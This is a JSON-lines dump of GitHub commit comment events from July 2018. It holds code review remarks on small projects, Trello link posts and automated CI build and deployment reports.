{"id":"7946165729","type":"CommitCommentEvent","actor":{"login":"Philipp91"},"repo":{"name":"RaphaelHaettich/react-mui-speeddial"},"payload":{"comment":{"id":29662424,"position":null,"line":null,"path":null,"commit_id":"9a0d8d8a775231f9d866eca93a9d7574f4963717","created_at":"2018-07-10T20:24:40Z","updated_at":"2018-07-10T20:24:40Z","author_association":"NONE","body":"Now it's 0.20.1"}},"created_at":"2018-07-10T20:24:40Z"}
{"id":"7946166674","type":"CommitCommentEvent","actor":{"login":"jlindgren90"},"repo":{"name":"audacious-media-player/audacious"},"payload":{"comment":{"id":29662428,"position":null,"line":null,"path":null,"commit_id":"7d42c365dc91b90994eb724f212d6ccffcc63209","created_at":"2018-07-10T20:24:52Z","updated_at":"2018-07-10T20:24:52Z","author_association":"MEMBER","body":"Well, it wasn't meant to be initialized.  Neither is VisNode::data."}},"created_at":"2018-07-10T20:24:52Z"}
{"id":"7946185613","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662456,"position":36,"line":36,"path":"StockMarket.UnitTests/PriceAnalyzerServiceTests.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:28:41Z","updated_at":"2018-07-10T20:28:41Z","author_association":"NONE","body":"Its cleaner to use object initializer for creation the hardcoded data for unit testing. E.g.\r\n```\r\nvar month = new Month()\r\n            {\r\n                DaysList = new List<Day>()\r\n                {\r\n                    new Day(){ DayOfMonth = 1, Price = 1 }\r\n                }\r\n            };\r\nvar month = new Month()\r\n            {\r\n                DaysList = new List<Day>()\r\n                {\r\n                    new Day(){ DayOfMonth = 1, Price = 1 }\r\n                }\r\n            };\r\n```"}},"created_at":"2018-07-10T20:28:41Z"}
{"id":"7946189811","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662465,"position":null,"line":null,"path":null,"commit_id":"73d2fd56840ab4173bb8058c65f245570fc36196","created_at":"2018-07-10T20:29:30Z","updated_at":"2018-07-10T20:29:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/uuwgb3Mj/3-setup-the-project)"}},"created_at":"2018-07-10T20:29:30Z"}
{"id":"7946190415","type":"CommitCommentEvent","actor":{"login":"clairezed"},"repo":{"name":"yaf/elsif.fr"},"payload":{"comment":{"id":29662466,"position":null,"line":null,"path":null,"commit_id":"b77b34c6b463cce95dabfee0af344a64148e167d","created_at":"2018-07-10T20:29:37Z","updated_at":"2018-07-10T20:29:37Z","author_association":"NONE","body":"Ah bin pas de quoi :)"}},"created_at":"2018-07-10T20:29:37Z"}
{"id":"7946190525","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662467,"position":null,"line":null,"path":null,"commit_id":"39f9412856389b82f7c8c50a6af4d32ff6ce5df9","created_at":"2018-07-10T20:29:38Z","updated_at":"2018-07-10T20:29:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/uuwgb3Mj/3-setup-the-project)"}},"created_at":"2018-07-10T20:29:38Z"}
{"id":"7946191067","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662468,"position":null,"line":null,"path":null,"commit_id":"9631d856c5d72e66b2e30f62109fb0c265c71d35","created_at":"2018-07-10T20:29:45Z","updated_at":"2018-07-10T20:29:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/uuwgb3Mj/3-setup-the-project)"}},"created_at":"2018-07-10T20:29:45Z"}
{"id":"7946191269","type":"CommitCommentEvent","actor":{"login":"Maros-1984"},"repo":{"name":"Maros-1984/intellij-plugin-save-actions"},"payload":{"comment":{"id":29662469,"position":22,"line":49,"path":"src/main/java/com/dubreuia/processors/ReformatCodeProcessor.java","commit_id":"03dc717d6801bcaf42fe7f8c952147aa1572fb78","created_at":"2018-07-10T20:29:47Z","updated_at":"2018-07-10T20:29:47Z","author_association":"OWNER","body":"This fixes the issue for me. That said, I'm not sure what are the consequences of deleting this brach of the IF."}},"created_at":"2018-07-10T20:29:47Z"}
{"id":"7946191939","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"joviane/cursoCPlusPlusAlura"},"payload":{"comment":{"id":29662471,"position":32,"line":32,"path":"programa.cpp","commit_id":"1a9917fe7f0bbeb934718e51f7ed57cd2fbeed8f","created_at":"2018-07-10T20:29:55Z","updated_at":"2018-07-10T20:29:55Z","author_association":"OWNER","body":"Beleza Gui, vou extrair... Fiz assim porque está no curso de C mesmo :-/"}},"created_at":"2018-07-10T20:29:55Z"}
{"id":"7946192208","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662472,"position":null,"line":null,"path":null,"commit_id":"13cc40770c7f955f41b47587203bd1b1e69c0806","created_at":"2018-07-10T20:29:58Z","updated_at":"2018-07-10T20:29:58Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/uuwgb3Mj/3-setup-the-project)"}},"created_at":"2018-07-10T20:29:58Z"}
{"id":"7946192888","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662475,"position":null,"line":null,"path":null,"commit_id":"c981ac51d386961260021b30964a67198d332b8e","created_at":"2018-07-10T20:30:07Z","updated_at":"2018-07-10T20:30:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the project](https://trello.com/c/uuwgb3Mj/3-setup-the-project)"}},"created_at":"2018-07-10T20:30:07Z"}
{"id":"7946195470","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/openmeeg-feedstock"},"payload":{"comment":{"id":29662480,"position":null,"line":null,"path":null,"commit_id":"b72eb032c5ce62b373e4cf4c6862f577d3ebd871","created_at":"2018-07-10T20:30:33Z","updated_at":"2018-07-10T20:30:33Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @massich, @agramfort were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @massich, @agramfort were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T20:30:33Z"}
{"id":"7946195635","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662481,"position":null,"line":null,"path":null,"commit_id":"e29e217fcc607b3999496200f5fba1824350b20f","created_at":"2018-07-10T20:30:35Z","updated_at":"2018-07-10T20:30:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Setup the form for the todo list](https://trello.com/c/fKQJKKPM/5-setup-the-form-for-the-todo-list)"}},"created_at":"2018-07-10T20:30:35Z"}
{"id":"7946196039","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662482,"position":49,"line":49,"path":"StockMarket.UnitTests/PriceAnalyzerServiceTests.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:30:40Z","updated_at":"2018-07-10T20:30:40Z","author_association":"NONE","body":"You should use here AreEqual (expectedResult, realResult) "}},"created_at":"2018-07-10T20:30:40Z"}
{"id":"7946196609","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29662485,"position":null,"line":null,"path":null,"commit_id":"349757ebd1c5b67dfb0b75faf0753912753d2a97","created_at":"2018-07-10T20:30:47Z","updated_at":"2018-07-10T20:30:47Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |    -0.33 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `texts_total`      |     5    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `lat`     |       -1 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi1351/phi001/phi1351.phi001.perseus-eng2.xml` | New      |\n| `./data/phi1351/phi002/phi1351.phi002.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi003/__cts__.xml`                     | New      |\n| `./data/phi1351/phi003/phi1351.phi003.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi004/phi1351.phi004.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi005/__cts__.xml`                     | New      |\n| `./data/phi1351/phi005/phi1351.phi005.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi001/phi1351.phi001.perseus-eng2.xml` | Failing  |\n| `./data/phi1351/phi002/phi1351.phi002.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi003/__cts__.xml`                     | Passing  |\n| `./data/phi1351/phi003/phi1351.phi003.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi004/phi1351.phi004.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi005/__cts__.xml`                     | Passing  |\n| `./data/phi1351/phi005/phi1351.phi005.perseus-eng1.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4437)*\n"}},"created_at":"2018-07-10T20:30:47Z"}
{"id":"7946198557","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/elekamate"},"payload":{"comment":{"id":29662488,"position":5,"line":77,"path":"week-08/day-02/01ListingTodos/01ListingTodos/Controllers/ToDoController.cs","commit_id":"1171fccbaea8fadb0f1a4b1bcc8d9b192c79a662","created_at":"2018-07-10T20:31:10Z","updated_at":"2018-07-10T20:31:10Z","author_association":"NONE","body":"routing can be done in the `[HttpGet]` attribute, but this is just making things cleaner, so this is fine like this"}},"created_at":"2018-07-10T20:31:10Z"}
{"id":"7946205545","type":"CommitCommentEvent","actor":{"login":"nightpool"},"repo":{"name":"glitch-soc/mastodon"},"payload":{"comment":{"id":29662504,"position":null,"line":null,"path":null,"commit_id":"402da8065c2b378cca6361f2c7252bd766f25dde","created_at":"2018-07-10T20:32:31Z","updated_at":"2018-07-10T20:32:31Z","author_association":"NONE","body":"dropping the table is unsafe in a zero-downtime context and *definitely* not necessary—especially because the migration-wide transaction is disabled. It would be safer to just leave the table around in case the migration fails or has a bug"}},"created_at":"2018-07-10T20:32:31Z"}
{"id":"7946205549","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/elekamate"},"payload":{"comment":{"id":29662505,"position":null,"line":null,"path":null,"commit_id":"1171fccbaea8fadb0f1a4b1bcc8d9b192c79a662","created_at":"2018-07-10T20:32:31Z","updated_at":"2018-07-10T20:32:31Z","author_association":"NONE","body":"this commit messgae tells me you created and added something around the frontend, but there are like 1000lines updated included something in your controller. My friend, are you telling the truth?"}},"created_at":"2018-07-10T20:32:31Z"}
{"id":"7946208231","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29662513,"position":null,"line":null,"path":null,"commit_id":"c26168dbcb6d7870c0be391b4a6f5da5b4b06f71","created_at":"2018-07-10T20:33:03Z","updated_at":"2018-07-10T20:33:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-clean](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-clean).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-clean-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T20:33:03Z"}
{"id":"7946209197","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662514,"position":47,"line":47,"path":"StockMarket/App_Start/UnityConfig.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:33:15Z","updated_at":"2018-07-10T20:33:15Z","author_association":"NONE","body":"In big project, I like to have a white space(or even regions) between sections but for the purpose of this small project, I think it's ok as it is."}},"created_at":"2018-07-10T20:33:15Z"}
{"id":"7946209975","type":"CommitCommentEvent","actor":{"login":"marcelpaulo"},"repo":{"name":"rndusr/stig"},"payload":{"comment":{"id":29662516,"position":null,"line":null,"path":null,"commit_id":"39f30e6485c39342e3e2327b7eab4ff6506ba7d0","created_at":"2018-07-10T20:33:25Z","updated_at":"2018-07-10T20:33:25Z","author_association":"CONTRIBUTOR","body":"This is really really useful. I had already got used to quickly creating a new tab filtering `ls` results, but this is much more practical. Thanks !"}},"created_at":"2018-07-10T20:33:25Z"}
{"id":"7946211619","type":"CommitCommentEvent","actor":{"login":"jakobdoerr"},"repo":{"name":"smichel/LEX_2018_grenzschicht"},"payload":{"comment":{"id":29662519,"position":16,"line":83,"path":"LoRA_slave_test/LoRA_slave_test.ino","commit_id":"c47168c8e028fce7bb08b7825e8add42b2199682","created_at":"2018-07-10T20:33:46Z","updated_at":"2018-07-10T20:33:46Z","author_association":"COLLABORATOR","body":"Change this to uint32_t...better for big numbers >65000"}},"created_at":"2018-07-10T20:33:46Z"}
{"id":"7946211781","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/elekamate"},"payload":{"comment":{"id":29662521,"position":null,"line":null,"path":null,"commit_id":"49218d92e9ab8ad8bcbd0a53e515a466c58c5874","created_at":"2018-07-10T20:33:49Z","updated_at":"2018-07-10T20:33:49Z","author_association":"NONE","body":"this is a comment for your `ToDoController.cs`: overall nice work, endpoint skeleton is fine"}},"created_at":"2018-07-10T20:33:49Z"}
{"id":"7946214673","type":"CommitCommentEvent","actor":{"login":"iamolever"},"repo":{"name":"swarwick/java-cme-mdp3-handler"},"payload":{"comment":{"id":29662525,"position":null,"line":null,"path":null,"commit_id":"3aa29ef3f7127cafde5d940382aacb76cd12e9bf","created_at":"2018-07-10T20:34:24Z","updated_at":"2018-07-10T20:34:24Z","author_association":"NONE","body":"Hi,\r\nThe fix is correct. Maybe just \"nice to have\" thing: now we could use lambda in flows which are not related to message processing"}},"created_at":"2018-07-10T20:34:24Z"}
{"id":"7946214923","type":"CommitCommentEvent","actor":{"login":"ppinard"},"repo":{"name":"ppinard/matplotlib-scalebar"},"payload":{"comment":{"id":29662526,"position":null,"line":null,"path":null,"commit_id":"80e2142b081a2f065655dd8a55abad6207f1a32c","created_at":"2018-07-10T20:34:27Z","updated_at":"2018-07-10T20:34:27Z","author_association":"OWNER","body":"Only by Travis. Travis only supports Python 3.7 beta."}},"created_at":"2018-07-10T20:34:27Z"}
{"id":"7946216066","type":"CommitCommentEvent","actor":{"login":"rivex00055"},"repo":{"name":"rivex00055/test"},"payload":{"comment":{"id":29662530,"position":5,"line":9,"path":"index.php","commit_id":"9029c463307fe5b933da0c38285959dcdf2a54af","created_at":"2018-07-10T20:34:41Z","updated_at":"2018-07-10T20:34:41Z","author_association":"OWNER","body":"okok\r\n"}},"created_at":"2018-07-10T20:34:41Z"}
{"id":"7946216281","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662531,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-10T20:34:44Z","updated_at":"2018-07-10T20:34:44Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T20:34:44Z"}
{"id":"7946219122","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29662539,"position":null,"line":null,"path":null,"commit_id":"ecc2859777ded7126a2be075f055fa915e62ae3b","created_at":"2018-07-10T20:35:19Z","updated_at":"2018-07-10T20:35:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - State Tree (MVP)](https://trello.com/c/1zxKpwCG/4-todo-state-tree-mvp)"}},"created_at":"2018-07-10T20:35:19Z"}
{"id":"7946219563","type":"CommitCommentEvent","actor":{"login":"wilmanULS"},"repo":{"name":"wilmanULS/TesisAgente"},"payload":{"comment":{"id":29662541,"position":null,"line":null,"path":null,"commit_id":"2e780fcab5759a2a86c579459da46f3317802a9f","created_at":"2018-07-10T20:35:24Z","updated_at":"2018-07-10T20:35:24Z","author_association":"OWNER","body":"solo has dado un enter"}},"created_at":"2018-07-10T20:35:24Z"}
{"id":"7946221265","type":"CommitCommentEvent","actor":{"login":"jakobdoerr"},"repo":{"name":"smichel/LEX_2018_grenzschicht"},"payload":{"comment":{"id":29662547,"position":56,"line":117,"path":"LoRA_slave_test/LoRA_slave_test.ino","commit_id":"c47168c8e028fce7bb08b7825e8add42b2199682","created_at":"2018-07-10T20:35:44Z","updated_at":"2018-07-10T20:35:44Z","author_association":"COLLABORATOR","body":"change i from int to long"}},"created_at":"2018-07-10T20:35:44Z"}
{"id":"7946221574","type":"CommitCommentEvent","actor":{"login":"ThatCynicalX"},"repo":{"name":"Earthcomputer/clientcommands"},"payload":{"comment":{"id":29662550,"position":null,"line":null,"path":null,"commit_id":"63da695922120cf17821ba0dc8c9c8178d9b4e10","created_at":"2018-07-10T20:35:48Z","updated_at":"2018-07-10T20:35:48Z","author_association":"NONE","body":"Why was this disabled?"}},"created_at":"2018-07-10T20:35:48Z"}
{"id":"7946223697","type":"CommitCommentEvent","actor":{"login":"iurien"},"repo":{"name":"drobilla/lilv"},"payload":{"comment":{"id":29662551,"position":null,"line":null,"path":null,"commit_id":"5e80e165754064e9942fdf7bd3449a9f4fa047a0","created_at":"2018-07-10T20:36:13Z","updated_at":"2018-07-10T20:36:13Z","author_association":"NONE","body":"From the first look, I afraid that this is not enough to fix the issue. Now instead of failing to create the link it just will not create/update it in the first place and the danging link will remain, thus the plugin will not find the instrument after restarting the application. There is need to check if the path is danging link and remove it, and create the updated link."}},"created_at":"2018-07-10T20:36:13Z"}
{"id":"7946226596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662556,"position":null,"line":null,"path":null,"commit_id":"f61183cb3adbd9fc35376a2aaea2847857f8db6e","created_at":"2018-07-10T20:36:48Z","updated_at":"2018-07-10T20:36:48Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-MacOS-10.9-clang: OK (2930 of 2931 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f61183cb3adbd9fc35376a2aaea2847857f8db6e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T20:36:48Z"}
{"id":"7946226763","type":"CommitCommentEvent","actor":{"login":"ThibG"},"repo":{"name":"glitch-soc/mastodon"},"payload":{"comment":{"id":29662557,"position":null,"line":null,"path":null,"commit_id":"402da8065c2b378cca6361f2c7252bd766f25dde","created_at":"2018-07-10T20:36:50Z","updated_at":"2018-07-10T20:36:50Z","author_association":"NONE","body":"Hm, ok. Can you propose a fix for that? It would also need to conditionally create the table in the down migration."}},"created_at":"2018-07-10T20:36:50Z"}
{"id":"7946228077","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29662566,"position":5,"line":13,"path":"annual-robotics-competition/money-matters.md","commit_id":"c2f7d7bedb02ec84bd17a8602a45f803a4b0d342","created_at":"2018-07-10T20:37:07Z","updated_at":"2018-07-10T20:37:07Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-10T20:37:07Z"}
{"id":"7946229074","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29662567,"position":null,"line":null,"path":null,"commit_id":"df33d6fa7f77bf012f8046b3d18775422c477dfe","created_at":"2018-07-10T20:37:17Z","updated_at":"2018-07-10T20:37:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - Initialize Project (MVP)](https://trello.com/c/E9X5hjgR/2-todo-initialize-project-mvp)"}},"created_at":"2018-07-10T20:37:17Z"}
{"id":"7946229193","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29662568,"position":10,"line":49,"path":"annual-robotics-competition/core-team.md","commit_id":"c2f7d7bedb02ec84bd17a8602a45f803a4b0d342","created_at":"2018-07-10T20:37:19Z","updated_at":"2018-07-10T20:37:19Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-10T20:37:19Z"}
{"id":"7946230707","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29662573,"position":null,"line":null,"path":null,"commit_id":"df33d6fa7f77bf012f8046b3d18775422c477dfe","created_at":"2018-07-10T20:37:37Z","updated_at":"2018-07-10T20:37:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - React (MVP)](https://trello.com/c/acir8wuH/5-todo-react-mvp)"}},"created_at":"2018-07-10T20:37:37Z"}
{"id":"7946233829","type":"CommitCommentEvent","actor":{"login":"JayTurnr"},"repo":{"name":"shobrook/statcode"},"payload":{"comment":{"id":29662579,"position":null,"line":null,"path":null,"commit_id":"cecc0f05d5dbdcd3746a94d3d779a81712a69d10","created_at":"2018-07-10T20:38:14Z","updated_at":"2018-07-10T20:38:14Z","author_association":"NONE","body":"Aw man! The pun was great!"}},"created_at":"2018-07-10T20:38:14Z"}
{"id":"7946234376","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662580,"position":null,"line":null,"path":null,"commit_id":"2c6d834c2e209315d20a2dd71dc8862ad0fe4fef","created_at":"2018-07-10T20:38:20Z","updated_at":"2018-07-10T20:38:20Z","author_association":"NONE","body":"`feat: edit/delete/search`  spooooo what? :D \r\nthis commit contains a lot of changes, and from this message I dont know what to expect in this change"}},"created_at":"2018-07-10T20:38:20Z"}
{"id":"7946235063","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29662584,"position":null,"line":null,"path":null,"commit_id":"8a1ee36477fdabc7c657e05e11e47806d2e3ef95","created_at":"2018-07-10T20:38:28Z","updated_at":"2018-07-10T20:38:28Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-8](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-8).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-8-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-10T20:38:28Z"}
{"id":"7946239341","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662592,"position":null,"line":null,"path":null,"commit_id":"2c6d834c2e209315d20a2dd71dc8862ad0fe4fef","created_at":"2018-07-10T20:39:17Z","updated_at":"2018-07-10T20:39:17Z","author_association":"NONE","body":"feedback to `List.cshtml`:\r\nsomething with the indentation went wrong there, but looks nice. "}},"created_at":"2018-07-10T20:39:17Z"}
{"id":"7946243826","type":"CommitCommentEvent","actor":{"login":"ctubbsii"},"repo":{"name":"apache/accumulo-website"},"payload":{"comment":{"id":29662598,"position":null,"line":null,"path":null,"commit_id":"36d107f805e9538ab0fa7c7e8267258aa10922a0","created_at":"2018-07-10T20:40:10Z","updated_at":"2018-07-10T20:40:10Z","author_association":"MEMBER","body":"Will probably also have to do this with the git commit hook."}},"created_at":"2018-07-10T20:40:10Z"}
{"id":"7946245907","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662604,"position":34,"line":26,"path":"week-08/Day-02/Todo/Todo/Views/Todo/List.cshtml","commit_id":"2c6d834c2e209315d20a2dd71dc8862ad0fe4fef","created_at":"2018-07-10T20:40:33Z","updated_at":"2018-07-10T20:40:33Z","author_association":"NONE","body":"I would use `var` in this line: `@foreach (TodoModel todo in @Model)`\r\nlike `@foreach (var todo in @Model)` but this is just personal preference"}},"created_at":"2018-07-10T20:40:33Z"}
{"id":"7946251749","type":"CommitCommentEvent","actor":{"login":"mikewalch"},"repo":{"name":"apache/accumulo-website"},"payload":{"comment":{"id":29662626,"position":null,"line":null,"path":null,"commit_id":"36d107f805e9538ab0fa7c7e8267258aa10922a0","created_at":"2018-07-10T20:41:33Z","updated_at":"2018-07-10T20:41:33Z","author_association":"MEMBER","body":"It was done in c29c50cddd4da406d"}},"created_at":"2018-07-10T20:41:33Z"}
{"id":"7946253485","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662630,"position":null,"line":null,"path":null,"commit_id":"f98a400be5e940b27b62a0071e2531fff4005c23","created_at":"2018-07-10T20:41:52Z","updated_at":"2018-07-10T20:41:52Z","author_association":"NONE","body":"sooooo how do I find a commit on your ToDo app with this commit message `chore(reddit)`? :D\r\n"}},"created_at":"2018-07-10T20:41:52Z"}
{"id":"7946253574","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29662631,"position":13,"line":27,"path":"Lesson 3/train.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T20:41:53Z","updated_at":"2018-07-10T20:41:53Z","author_association":"OWNER","body":"исправления я внес кроме тернарников... переписал их."}},"created_at":"2018-07-10T20:41:53Z"}
{"id":"7946261060","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29662651,"position":null,"line":null,"path":null,"commit_id":"60398bf53bb75b45f9c9f5fa4bfb6c796c08aefb","created_at":"2018-07-10T20:43:15Z","updated_at":"2018-07-10T20:43:15Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/80/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/80//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/60398bf53bb75b45f9c9f5fa4bfb6c796c08aefb/80/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/60398bf53bb75b45f9c9f5fa4bfb6c796c08aefb/80/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/60398bf53bb75b45f9c9f5fa4bfb6c796c08aefb/80/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/60398bf53bb75b45f9c9f5fa4bfb6c796c08aefb/80/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-10T20:43:15Z"}
{"id":"7946262578","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29662654,"position":29,"line":29,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-10T20:43:33Z","updated_at":"2018-07-10T20:43:33Z","author_association":"OWNER","body":"<facepalm>"}},"created_at":"2018-07-10T20:43:33Z"}
